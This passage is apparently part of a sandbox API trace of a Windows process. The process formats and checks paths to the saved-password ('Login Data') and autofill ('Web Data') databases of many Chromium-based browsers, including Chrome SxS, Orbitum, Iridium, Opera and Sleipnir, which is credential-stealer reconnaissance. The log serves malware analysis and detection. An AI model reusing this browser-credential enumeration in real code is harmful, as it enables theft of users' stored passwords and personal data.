param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 66 [0111.895] GetProcessHeap () returned 0x5b0000 [0111.895] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x88) returned 0x5cbe70 [0111.895] GetProcessHeap () returned 0x5b0000 [0111.896] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.896] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0111.897] GetProcessHeap () returned 0x5b0000 [0111.897] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.897] GetProcessHeap () returned 0x5b0000 [0111.897] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.897] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.898] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 74 [0111.898] GetProcessHeap () returned 0x5b0000 [0111.898] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x98) returned 0x5cbe80 [0111.898] GetProcessHeap () returned 0x5b0000 [0111.898] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.899] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0111.899] GetProcessHeap () returned 0x5b0000 [0111.899] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.899] GetProcessHeap () returned 0x5b0000 [0111.899] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.900] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.900] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 82 [0111.900] GetProcessHeap () returned 0x5b0000 [0111.900] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa8) returned 0x5cbe98 [0111.900] GetProcessHeap () returned 0x5b0000 [0111.901] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.901] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0111.902] GetProcessHeap () returned 0x5b0000 [0111.902] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.902] GetProcessHeap () returned 0x5b0000 [0111.902] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.902] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.903] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 80 [0111.903] GetProcessHeap () returned 0x5b0000 [0111.903] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa4) returned 0x5cbe90 [0111.903] GetProcessHeap () returned 0x5b0000 [0111.903] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.904] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0111.904] GetProcessHeap () returned 0x5b0000 [0111.904] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.904] GetProcessHeap () returned 0x5b0000 [0111.904] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.905] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.905] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 63 [0111.905] GetProcessHeap () returned 0x5b0000 [0111.906] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5cbe70 [0111.906] GetProcessHeap () returned 0x5b0000 [0111.906] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.907] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0111.907] GetProcessHeap () returned 0x5b0000 [0111.907] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.907] GetProcessHeap () returned 0x5b0000 [0111.907] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.908] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.908] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 71 [0111.908] GetProcessHeap () returned 0x5b0000 [0111.908] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x92) returned 0x5cbe80 [0111.908] GetProcessHeap () returned 0x5b0000 [0111.909] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.910] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0111.910] GetProcessHeap () returned 0x5b0000 [0111.910] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.910] GetProcessHeap () returned 0x5b0000 [0111.910] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.911] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.911] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 72 [0111.911] GetProcessHeap () returned 0x5b0000 [0111.911] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x94) returned 0x5cbe98 [0111.911] GetProcessHeap () returned 0x5b0000 [0111.912] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.912] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0111.912] GetProcessHeap () returned 0x5b0000 [0111.913] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.913] GetProcessHeap () returned 0x5b0000 [0111.913] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.913] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.914] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 70 [0111.914] GetProcessHeap () returned 0x5b0000 [0111.914] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5cbe90 [0111.914] GetProcessHeap () returned 0x5b0000 [0111.914] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.915] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0111.915] GetProcessHeap () returned 0x5b0000 [0111.916] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.916] GetProcessHeap () returned 0x5b0000 [0111.916] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.916] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.917] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 53 [0111.917] GetProcessHeap () returned 0x5b0000 [0111.917] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6e) returned 0x5cbe70 [0111.917] GetProcessHeap () returned 0x5b0000 [0111.918] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.918] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 0 [0111.918] GetProcessHeap () returned 0x5b0000 [0111.919] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.919] GetProcessHeap () returned 0x5b0000 [0111.919] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.919] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.920] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 61 [0111.920] GetProcessHeap () returned 0x5b0000 [0111.920] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5cbe80 [0111.920] GetProcessHeap () returned 0x5b0000 [0111.920] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.921] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0111.921] GetProcessHeap () returned 0x5b0000 [0111.922] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.922] GetProcessHeap () returned 0x5b0000 [0111.922] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.922] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.923] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 72 [0111.923] GetProcessHeap () returned 0x5b0000 [0111.923] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x94) returned 0x5cbe98 [0111.923] GetProcessHeap () returned 0x5b0000 [0111.923] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.924] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0111.924] GetProcessHeap () returned 0x5b0000 [0111.925] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.925] GetProcessHeap () returned 0x5b0000 [0111.925] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.927] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.928] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 70 [0111.928] GetProcessHeap () returned 0x5b0000 [0111.928] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5cbe90 [0111.928] GetProcessHeap () returned 0x5b0000 [0111.928] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.929] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0111.929] GetProcessHeap () returned 0x5b0000 [0111.930] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.930] GetProcessHeap () returned 0x5b0000 [0111.930] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.930] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.931] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 53 [0111.931] GetProcessHeap () returned 0x5b0000 [0111.931] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6e) returned 0x5cbe70 [0111.931] GetProcessHeap () returned 0x5b0000 [0111.931] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.932] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 0 [0111.932] GetProcessHeap () returned 0x5b0000 [0111.932] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.932] GetProcessHeap () returned 0x5b0000 [0111.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.933] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.934] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 61 [0111.934] GetProcessHeap () returned 0x5b0000 [0111.934] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5cbe80 [0111.934] GetProcessHeap () returned 0x5b0000 [0111.934] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.935] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0111.935] GetProcessHeap () returned 0x5b0000 [0111.935] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.935] GetProcessHeap () returned 0x5b0000 [0111.936] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7ca0 | out: hHeap=0x5b0000) returned 1 [0111.936] GetProcessHeap () returned 0x5b0000 [0111.936] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c7ca0 [0111.936] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0111.937] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c7ca0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0111.937] GetProcessHeap () returned 0x5b0000 [0111.937] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f90 [0111.938] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.939] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 89 [0111.939] GetProcessHeap () returned 0x5b0000 [0111.939] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb6) returned 0x5cbf20 [0111.939] GetProcessHeap () returned 0x5b0000 [0111.939] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.940] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0111.940] GetProcessHeap () returned 0x5b0000 [0111.941] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf20 | out: hHeap=0x5b0000) returned 1 [0111.941] GetProcessHeap () returned 0x5b0000 [0111.941] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f90 [0111.942] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.943] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 87 [0111.943] GetProcessHeap () returned 0x5b0000 [0111.944] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb2) returned 0x5cbf18 [0111.944] GetProcessHeap () returned 0x5b0000 [0111.944] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.945] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0111.945] GetProcessHeap () returned 0x5b0000 [0111.945] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf18 | out: hHeap=0x5b0000) returned 1 [0111.945] GetProcessHeap () returned 0x5b0000 [0111.945] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f90 [0111.946] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.947] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 70 [0111.947] GetProcessHeap () returned 0x5b0000 [0111.947] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5cbef8 [0111.947] GetProcessHeap () returned 0x5b0000 [0111.947] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.948] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0111.948] GetProcessHeap () returned 0x5b0000 [0111.948] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbef8 | out: hHeap=0x5b0000) returned 1 [0111.948] GetProcessHeap () returned 0x5b0000 [0111.948] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f90 [0111.949] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.949] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Default\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 78 [0111.949] GetProcessHeap () returned 0x5b0000 [0111.950] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0) returned 0x5bab78 [0111.950] GetProcessHeap () returned 0x5b0000 [0111.950] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.951] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0111.951] GetProcessHeap () returned 0x5b0000 [0111.951] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bab78 | out: hHeap=0x5b0000) returned 1 [0111.951] GetProcessHeap () returned 0x5b0000 [0111.951] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f90 [0111.952] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.953] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 95 [0111.953] GetProcessHeap () returned 0x5b0000 [0111.953] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc2) returned 0x5be9c8 [0111.953] GetProcessHeap () returned 0x5b0000 [0111.953] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.955] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0111.955] GetProcessHeap () returned 0x5b0000 [0111.955] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5be9c8 | out: hHeap=0x5b0000) returned 1 [0111.955] GetProcessHeap () returned 0x5b0000 [0111.955] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f90 [0111.958] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.959] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 93 [0111.959] GetProcessHeap () returned 0x5b0000 [0111.959] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xbe) returned 0x5cbf18 [0111.959] GetProcessHeap () returned 0x5b0000 [0111.960] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.961] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0111.961] GetProcessHeap () returned 0x5b0000 [0111.961] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf18 | out: hHeap=0x5b0000) returned 1 [0111.961] GetProcessHeap () returned 0x5b0000 [0111.961] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f90 [0111.962] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.963] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 76 [0111.963] GetProcessHeap () returned 0x5b0000 [0111.963] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9c) returned 0x5bac20 [0111.963] GetProcessHeap () returned 0x5b0000 [0111.963] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.964] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0111.964] GetProcessHeap () returned 0x5b0000 [0111.965] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bac20 | out: hHeap=0x5b0000) returned 1 [0111.965] GetProcessHeap () returned 0x5b0000 [0111.965] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f90 [0111.966] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.967] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Default\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 84 [0111.967] GetProcessHeap () returned 0x5b0000 [0111.967] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xac) returned 0x5cbf08 [0111.967] GetProcessHeap () returned 0x5b0000 [0111.967] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.968] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0111.969] GetProcessHeap () returned 0x5b0000 [0111.969] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf08 | out: hHeap=0x5b0000) returned 1 [0111.969] GetProcessHeap () returned 0x5b0000 [0111.969] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f90 [0111.970] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.971] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 118 [0111.971] GetProcessHeap () returned 0x5b0000 [0111.971] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xf0) returned 0x5cbf20 [0111.971] GetProcessHeap () returned 0x5b0000 [0111.972] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.976] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0111.976] GetProcessHeap () returned 0x5b0000 [0111.976] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf20 | out: hHeap=0x5b0000) returned 1 [0111.977] GetProcessHeap () returned 0x5b0000 [0111.977] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f90 [0111.977] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.978] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Web 